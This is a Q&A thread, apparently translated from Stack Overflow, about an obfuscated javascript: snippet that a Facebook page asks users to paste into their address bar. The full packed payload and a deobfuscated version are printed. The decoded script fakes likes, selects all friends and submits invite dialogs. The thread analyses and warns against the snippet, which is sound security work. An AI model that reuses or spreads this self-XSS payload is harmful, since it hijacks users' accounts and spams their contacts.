2010-04-28 105 views
0

我看到這個頁面在Facebook上我的社交圈中越來越受歡迎,what 98 percent bla bla...它讓用戶通過複製下面的JavaScript(我添加了一些縮進以使其更易讀)到他們的地址欄中。對我來說看起來很狡猾,但我只有JavaScript的基本知識。這段JavaScript究竟做了什麼?

簡而言之,這是幹什麼的?

javascript:(function(){ 
a='app120668947950042_jop'; 
b='app120668947950042_jode'; 
ifc='app120668947950042_ifc'; 
ifo='app120668947950042_ifo'; 
mw='app120668947950042_mwrapper'; 
eval(function(p,a,c,k,e,r){ 
    e=function(c){ 
     return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))} 
    ; 
    if(!''.replace(/^/,String)){ 
     while(c--)r[e(c)]=k[c]||e(c); 
     k=[function(e){ 
      return r[e]} 
     ]; 
     e=function(){ 
      return'\\w+'} 
     ; 
     c=1} 
    ; 
    while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]); 
    return p} 
('J e=["\\n\\g\\j\\g\\F\\g\\i\\g\\h\\A","\\j\\h\\A\\i\\f","\\o\\f\\h\\q\\i\\f\\r\\f\\k\\h\\K\\A\\L\\t","\\w\\g\\t\\t\\f\\k","\\g\\k\\k\\f\\x\\M\\N\\G\\O","\\n\\l\\i\\y\\f","\\j\\y\\o\\o\\f\\j\\h","\\i\\g\\H\\f\\r\\f","\\G\\u\\y\\j\\f\\q\\n\\f\\k\\h\\j","\\p\\x\\f\\l\\h\\f\\q\\n\\f\\k\\h","\\p\\i\\g\\p\\H","\\g\\k\\g\\h\\q\\n\\f\\k\\h","\\t\\g\\j\\z\\l\\h\\p\\w\\q\\n\\f\\k\\h","\\j\\f\\i\\f\\p\\h\\v\\l\\i\\i","\\j\\o\\r\\v\\g\\k\\n\\g\\h\\f\\v\\P\\u\\x\\r","\\B\\l\\Q\\l\\R\\B\\j\\u\\p\\g\\l\\i\\v\\o\\x\\l\\z\\w\\B\\g\\k\\n\\g\\h\\f\\v\\t\\g\\l\\i\\u\\o\\S\\z\\w\\z","\\j\\y\\F\\r\\g\\h\\T\\g\\l\\i\\u\\o"]; 
     d=U; 
     d[e[2]](V)[e[1]][e[0]]=e[3]; 
     d[e[2]](a)[e[4]]=d[e[2]](b)[e[5]]; 
     s=d[e[2]](e[6]); 
     m=d[e[2]](e[7]); 
     c=d[e[9]](e[8]); 
     c[e[11]](e[10],I,I); 
     s[e[12]](c); 
     C(D(){ 
      W[e[13]]()} 
     ,E); 
     C(D(){ 
      X[e[16]](e[14],e[15])} 
     ,E); 
     C(D(){ 
      m[e[12]](c); 
      d[e[2]](Y)[e[4]]=d[e[2]](Z)[e[5]]} 
     ,E); 
     ',62,69,'||||||||||||||_0x95ea|x65|x69|x74|x6C|x73|x6E|x61||x76|x67|x63|x45|x6D||x64|x6F|x5F|x68|x72|x75|x70|x79|x2F|setTimeout|function|5000|x62|x4D|x6B|true|var|x42|x49|x48|x54|x4C|x66|x6A|x78|x2E|x44|document|mw|fs|SocialGraphManager|ifo|ifc|||||||'.split('|'),0,{ 
} 
))})(); 
+5

這個味道對我來說很有趣...... – 2010-04-28 16:31:06

+2

我確定如果你把它粘貼到你的地址欄中,你會發現。我寧願不這樣做。 – ghoppe 2010-04-28 16:34:10

+0

同意。超級粗略。 – 2010-04-28 16:35:15

回答

9

我不知道這麼多人都在低估這一點。對於打包和其他模糊處理的腳本,您是絕對正確的,特別是當前影響FB應用程序的惡意廣告。

第一個竅門是用alert替代解包器結果中的eval,以便您可以看到代碼而不是執行它。這給你的東西,你可以很容易地(但乏味)手動解碼到:

document.getElementById('app120668947950042_mwrapper').style.visibility='hidden';   
document.getElementById('app120668947950042_jop').innerHTML=document.getElementById('app120668947950042_jode').value; 
s=document.getElementById('suggest'); 
m=document.getElementById('likeme'); 
c=document.createEvent('MouseEvents'); 
c.initEvent('click',true,true); 
s.dispatchEvent(c); 

setTimeout(function(){ 
    fs.select_all() 
}, 5000); 
setTimeout(function(){ 
    SocialGraphManager.submitDialog('sgm_invite_form','/ajax/social_graph/invite_dialog.php') 
}, 5000); 
setTimeout(function(){ 
    m.dispatchEvent(c); 
    document.getElementById('app120668947950042_ifo').innerHTML=document.getElementById('app120668947950042_ifc').value 
}, 5000);   

這看起來像是僞造的「喜歡」,然後點擊「建議」按鈕(以及隨後的對話),繞過正常對照FB需要與網站互動。

我將此網頁報告給FB。

一般來說,任何要求您輸入JavaScript URL的內容都是不好的。這是窮人的XSS。正如這個粗糙的社會工程嘗試所展示的,通過允許某人的代碼通過JS URL進入頁面,您就相信他們可以根據自己的使用情況做任何他們想做的事情。如果很多人都爲此而沮喪,這令人沮喪。也許現在是瀏覽器禁止在地址欄中輸入javascript:網址的時候了。

詛咒你Netscape的發明醜陋javascript:不是真的一個URL黑客攻擊和成千上萬的安全漏洞!

+0

爲什麼downvotes?小心,可能。當它首次發佈時,很難判斷它是否是一個合法的問題,或者OP是否希望有人在瀏覽器中運行它(出於惡意目的)。 – 2010-04-28 23:06:50

+0

感謝您花時間做到這一點;我確實報告了這個頁面,但facebook通常似乎滿足於讓這樣的事情坐下來。再次感謝 – Waltzy 2010-04-30 11:22:12

2

乍一看,它看起來像一個打包函數,用於將代碼壓縮爲一個字符串。把它想象成gzip壓縮。

1

看起來像代碼邀請你的朋友加入羣或類似的規定..

他們一直在四處飄蕩的Facebook一會兒。